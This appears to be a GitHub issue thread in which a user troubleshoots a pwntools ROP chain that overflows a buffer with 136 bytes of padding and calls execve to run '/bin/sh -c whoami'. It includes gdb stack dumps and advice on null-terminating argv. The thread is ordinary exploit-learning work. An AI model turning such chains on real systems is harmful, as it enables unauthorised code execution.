Open rommarius opened 1 month ago
rommarius
commented
1 month ago [------------------------------------stack-------------------------------------]
0000| 0x7fffffffe580 --> 0x7fffffffe5a0 --> 0x0
0008| 0x7fffffffe588 --> 0x68732f6e69622f ('/bin/sh')
0016| 0x7fffffffe590 --> 0x242424242400632d ('-c')
0024| 0x7fffffffe598 --> 0x2400696d616f6877 ('whoami')
Arusekk
commented
1 month ago Remember to null-terminate your argv. Hope that helps.
rop.call('execve', [b'bin_sh', [[b'/bin/sh'], [b'-c'], [b'whoami'], 0], 0])EDIT: I wrote sth about double brackets, but I was wrong. Sorry for confusion.
rommarius
commented
1 month ago thank for the fast response: but it seems here that the 0 at the end is interpreted as parameter! spaws a shell but getting this error:
whoami: 0: cannot open : No such file
Arusekk
commented
1 month ago Please paste your full code, I think you used b'0' instead of 0.
rommarius
commented
1 month ago hey it seems that the -c parameter gets ignored, can someone explain me why? the stack seems looking correct.
bin_sh = libc.address + 0x1cb42f
system = libc.address + 0x0000000000050d70
rop = ROP(program, base=0x7fffffffe400)
rop.call('execve', [bin_sh, [[bin_sh], [b'-c'], [b'whoami'], 0], 0])
chain_1 = b''
chain_1 += b'\x00'*136 # chain_1 += b'B'*6
chain_1 += rop.chain()
print(rop.dump())getting this error /bin/sh: 0: cannot open whoami: No such file
when i type in my terminal /bin/sh whoami gettiing the same error that why i think the -c parameter gets ignored for unknown reason. my argv is still null terminated without i would get SIGSEGV.
wasn't able to spawn a shell with command as parameter:
when i use SROP with write what where gadgets to build a arbitrary string in memory i'm able to spawn a shell but i failed to build an array for the rsi register argv[]. is there any better explaination?